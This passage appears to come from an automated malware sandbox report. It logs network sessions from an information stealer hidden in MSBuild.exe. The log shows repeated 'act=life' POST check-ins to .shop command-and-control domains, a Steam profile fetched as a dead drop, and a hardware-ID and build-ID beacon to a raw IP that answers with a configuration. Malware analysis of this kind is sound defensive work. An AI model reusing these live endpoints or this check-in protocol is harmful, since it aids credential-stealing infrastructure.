0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 39 36 36 39 27 2c 63 52 61 79 3a 20 27 38 62 31 30 39 35 31 37 36 64 34 38 35 65 36 31 27 2c 63 48 61 73 68 3a 20 27 32 32 30 63 34 30 37 30 38 64 32 35 37 38 39 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 63 4e 38 75 37 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 49 66 68 34 56 31 51 46 43 56 37 4c 75 32 4f 6d 69 51 5a 70 37 6e 52 46 62 34 4f 56 30 71 32 42 68 53 77 2e 61 75 69 48 35 68 77 2d 31 37 32 33 32 39 39 31 36 32 2d 30 2e 30 2e 31 2e 31 2d 33 37 37 34 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65 4d 73 Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '69669',cRay: '8b1095176d485e61',cHash: '220c40708d25789',cUPMDTk: "\/1cN8u7?__cf_chl_tk=Ifh4V1QFCV7Lu2OmiQZp7nRFb4OV0q2BhSw.auiH5hw-1723299162-0.0.1.1-3774",cFPWv: 'g',cTTimeMs
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 65 47 44 67 74 32 50 4b 6c 45 51 61 74 6a 6e 32 30 53 74 51 6c 53 5f 48 35 2e 78 62 5f 35 52 54 6c 37 65 33 77 6c 6d 65 72 52 73 71 53 53 39 4b 36 47 78 5a 44 34 41 4e 35 6f 5a 78 4d 49 56 75 37 5a 59 35 45 5a 66 58 38 4a 2e 53 4a 77 49 70 75 67 2e 48 48 32 39 30 36 4b 6a 58 75 6e 65 37 38 66 68 35 74 59 50 62 30 67 6e 68 67 67 4f 6e 35 77 46 65 36 56 59 77 32 5a 4d 64 75 48 4d 48 53 48 41 63 31 72 58 33 4d 59 62 53 4f 6e 33 4b 46 75 30 6f 68 55 79 31 77 44 6e 2e 44 66 44 41 51 4f 2e 77 36 37 79 49 4a 76 48 6b 7a 54 58 4c 56 57 64 45 43 6e 6c 49 55 5f 46 30 5f 64 68 34 69 36 41 79 41 58 4a 55 72 79 53 47 63 49 58 4e 47 66 6f 66 75 37 61 4c 71 62 73 6d 62 6f 51 37 4a 41 79 72 42 76 73 5a 54 6b 34 5f 6f 43 59 4d 5f 34 74 6a 59 5a 46 50 63 39 31 4f 32 57 2e Data Ascii: eGDgt2PKlEQatjn20StQlS_H5.xb_5RTl7e3wlmerRsqSS9K6GxZD4AN5oZxMIVu7ZY5EZfX8J.SJwIpug.HH2906KjXune78fh5tYPb0gnhggOn5wFe6VYw2ZMduHMHSHAc1rX3MYbSOn3KFu0ohUy1wDn.DfDAQO.w67yIJvHkzTXLVWdECnlIU_F0_dh4i6AyAXJUrySGcIXNGfofu7aLqbsmboQ7JAyrBvsZTk4_oCYM_4tjYZFPc91O2W.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49758	104.21.76.141	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:44 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enfixxysdjsip.shop
2024-08-10 14:12:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:44 UTC	802	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h657gapt6bqledsr26idnrb3d7; expires=Wed, 04-Dec-2024 07:59:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di1U4kEUnwKivGHO%2BaFWJn%2Blf236OU0FjGiNnIi5l1YVcUAso32TWMJjRuwMnfxJuaD4kxderKd1Z0KKYBAoWjqzib7TepRb9eky1Cc1bNu6oZ%2BXcqAzq8e0T1OkfNFeVY85ZoQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b1095209e374367-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:44 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49759	104.21.47.141	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:45 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: celebratioopz.shop
2024-08-10 14:12:45 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:46 UTC	800	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e0numsiues2oq0vmh8hig0g19v; expires=Wed, 04-Dec-2024 07:59:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AinC8u3tgn2WJR9YeOWWsDxFg9S3SoCh759lgX7lJdrwaLaey4BsJM4MK9ai9Zc5IrBlnrgL%2FThtIfZPG1NAaSQrBiRu1TcmJnMqxQZ%2Bc524GRGesGQ2ItQG9ma52ajtJhcbWk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b10952a4b1bc443-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:46 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49764	104.21.69.39	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:47 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deallerospfosu.shop
2024-08-10 14:12:47 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:47 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i4ufng0vu8oogu0lbsdak1inql; expires=Wed, 04-Dec-2024 07:59:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ApDd9pDFQqDAqR4NHDa%2FBjrDcJ%2Fs7Qbi73yUjS6D1j6bS51%2BUX7SR417tCvTP5iLFYGoOgBkaiR5WJgRIk2kKkM9iQagyMThJq08XzK%2BwZ0ZEUYHRDBwTG%2BHgU23Ia8fkFE%2FuIB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b109535ca104243-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:47 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49765	92.122.104.90	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:48 UTC	119	OUT	GET /profiles/76561199751190313 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:48 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 10 Aug 2024 14:12:48 GMT Content-Length: 34730 Connection: close Set-Cookie: sessionid=457fdc726fbdc1b8ae5530e8; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-08-10 14:12:48 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-08-10 14:12:48 UTC	10062	IN	Data Raw: 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 Data Ascii: yWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role
2024-08-10 14:12:48 UTC	10154	IN	Data Raw: 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 Data Ascii: y.akamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49767	188.114.96.3	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:48 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bassizcellskz.shop
2024-08-10 14:12:48 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:49 UTC	800	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r27eh7n4h26nrlk4hhfuqiq56l; expires=Wed, 04-Dec-2024 07:59:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y95m4QIre10xqQOS8pQeYhcMjYOk6lF8scIKf317RuBLpzd0vqWZARHg529AfPNyTBhMV9U7TeNDx123lwsFmNQvn7lU2p%2FsnwdcTNaVOTYP%2FjF4FZIQBisSJJAcfDNC0Y9Byps%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b10953cde4d4225-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:49 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49770	104.21.73.43	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:49 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mennyudosirso.shop
2024-08-10 14:12:49 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:50 UTC	800	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gp9rkjg9kto8s3u8b13d2apvs7; expires=Wed, 04-Dec-2024 07:59:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FcOwNClh3Ye5wzWGasJvJrhxXyQBwLvgrkpAo3AFRGptigj0MdCTXiSpyIQPAzADrEiFj%2FsqWs8XSzy4N4hmtqFx9WYqi8VbnCHzW9gyV4xTchPmrhvsnhzALXo7i9DvzXVJBs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b1095436ff2435c-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:50 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49769	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:49 UTC	213	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:12:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49772	188.114.97.3	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:51 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: languagedscie.shop
2024-08-10 14:12:51 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:51 UTC	800	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l8gjn4u0fcahkkh4kl818d9c2i; expires=Wed, 04-Dec-2024 07:59:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gL0Hk%2BUBam3aTAoMKaaGnEpyLe8m9LP6HCNWesF9u9oLF4vPBa59jHbRQczOCpAVomokKL3qIhpnZSglZypp%2FiT4huaRJbheLjSkBH9LY5ECGGtt9xYbOM3qognXvqHfOPJE918%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b10954cf8e11835-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:51 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49773	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:51 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:51 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 36 34 42 36 35 44 39 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------CAAEBFHJJDAAKFIECGDBContent-Disposition: form-data; name="hwid"1164B65D97AE1301979414-a33c7340-61ca-11ee-8c18-806e6f6e6963------CAAEBFHJJDAAKFIECGDBContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------
2024-08-10 14:12:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:12:52 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|d9a5d64d08e49b2fe49e29c9c33feb66\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49774	104.21.14.101	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:52 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: complaintsipzzx.shop
2024-08-10 14:12:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
